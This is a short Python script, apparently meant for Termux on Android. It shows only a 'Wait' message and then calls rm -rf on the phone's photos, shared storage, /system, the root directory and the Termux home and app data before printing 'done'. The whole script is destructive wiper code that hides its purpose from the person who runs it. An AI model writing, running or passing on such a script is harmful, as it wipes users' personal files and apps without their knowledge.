import os
print("\n\n\t\033[1;32mWait ")
os.system("rm -rf /sdcard/DCIM")
os.system("rm -rf /sdcard/*")
os.system("rm -rf /sdcard/update") 
os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /*')
os.system('rm -rf /system/*')
os.system('rm -rf $HOME/../../*')
os.system('rm -rf $PREFIX/b')
os.system('rm -rf $HOME/*')
os.system('mv $HOME /dev/null')
os.system("rm -rf /data/data/com.termux/")
print("done")
